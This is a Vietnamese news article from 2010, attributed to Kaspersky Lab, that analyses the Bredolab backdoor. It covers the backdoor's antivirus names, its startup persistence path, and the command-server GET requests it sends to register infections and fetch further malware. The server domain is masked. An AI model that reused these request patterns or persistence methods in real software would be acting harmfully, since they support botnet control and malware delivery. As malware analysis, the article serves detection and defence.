(Post 10/09/2010) Khái niệm backdoor được dùng
để chỉ những phần
mềm độc hại, được tạo ra để cài, phát tán mã độc vào máy tính người
của người dùng. Nếu xét về khía cạnh chức năng và kỹ thuật, Backdoor khá
giống với hệ thống quản lý và điều phối phần mềm. Những ứng dụng độc hại
này được tạo ra để làm bất cứ yêu cầu gì mà tin tặc muốn: gửi và nhận
dữ liệu, kích hoạt, sử dụng và xóa bất cứ file nào đó, hiển thị thông
báo lỗi, tự khởi động lại máy tính…
Những chương trình như này thường được sử dụng để liên
kết những nhóm máy tính bị lây nhiễm để tạo nên mô hình mạng botnet hoặc
zombie thường gặp. Và những kẻ đứng đằng sau tổ chức này có thể dễ dàng
tập trung 1 số lượng lớn hoặc rất lớn các máy tính – lúc này đã trở thành
công cụ cho tin tặc, nhằm thực hiện những âm mưu hoặc mục đích xấu.
1 bộ phận khác của Backdoor cũng có khả năng lây lan
và hoạt động giống hệt với Net-Worm, chúng ta có thể phân biệt chúng qua
khả năng lây lan, Backdoor không thể tự nhân bản và lây lan, trái ngược
hoàn toàn với Net-Worm. Nhưng chỉ cần nhận được lệnh đặc biệt từ phía
tin tặc, chúng sẽ đồng loạt lây lan và sản sinh với số lượng không thể
kiểm soát được.
Tại bài viết này, chúng ta sẽ cùng thảo luận về mẫu Backdoor.Win32.Bredolab.eua
(được đặt tên bởi Kaspersky), hoặc còn được biết đến dưới tên gọi:
- Trojan: Bredolab!n (McAfee)
- Mal/BredoPk-B (Sophos)
- Trj/Sinowal.DW (Panda)
- TrojanDownloader:Win32/Bredolab.AA (MS(OneCare))
- Trojan.Botnetlog.126 (DrWeb)
- Win32/TrojanDownloader.Bredolab.BE trojan (Nod32)
- Trojan.Downloader.Bredolab.EK (BitDef7)
- Backdoor.Bredolab.CNS (VirusBuster)
- Trojan.Win32.Bredolab (Ikarus)
- Cryptic.AGF (AVG)
- TR/Crypt.XPACK.Gen (AVIRA)
- W32/Bredolab.TP (Norman)
- Trojan.Win32.Generic.521C7EF8 (Rising)
- Backdoor.Win32.Bredolab.eua [AVP] (FSecure)
- Trojan-Downloader.Win32.Bredolab (Sunbelt)
- Backdoor.Bredolab.CNS (VirusBusterBeta)
Chúng được phát hiện vào ngày 3/6/2010 lúc 16:16 GMT,
“rục rịch” hoạt động tại 4/6/2010 lúc 03:28 GMT, và các thông tin phân
tích chi tiết được đăng tải vào ngày 12/7/2010 lúc 11:33 GMT.
Miêu tả chi tiết về mặt
kỹ thuật
Về bản chất, những chương trình mã độc như thế này thường
được quản lý bởi server riêng, và có nhiệm vụ tải các malware khác về
máy tính đã bị lây nhiễm.
Như tất cả các chương trình độc hại khác, chúng tự kích
hoạt cơ chế khởi động cùng hệ thống bằng cách copy file thực thi vào thư
mục autorun:
%Startup%\siszpe32.exe
và tạo ra những file có dạng như sau:
%appdata%\avdrn.dat
Về phương thức Payload, chúng thường xuyên kết nối tới
server:
http://*****lo.ru
nơi chúng gửi đi những yêu cầu như sau:
GET /new/controller.php?action=bot&entity_list=&
uid=&first=1&guid=880941764&v=15&rnd=8520045
Và kết quả là chương trình sẽ nhận lại lệnh, mã cụ thể
để tải các ứng dụng malware khác, chúng sẽ được lưu tại thư mục sau và
tự động kích hoạt:
%windir%\Temp\.exe
Sau đó chúng tiếp tục gửi đi những yêu cầu khác:
GET /new/controller.php?
action=report&guid=0&rnd=8520045&guid=&entity=1260187840:unique_start;
1260188029:unique_start;1260433697:unique_start;1260199741:unique_start
những dữ liệu này thông báo với hệ thống server rằng
máy tính của nạn nhân đã bị lây nhiễm
theo Kaspersky Lab ZAO
(nguồn itnews)
Tin dự trữ:
|
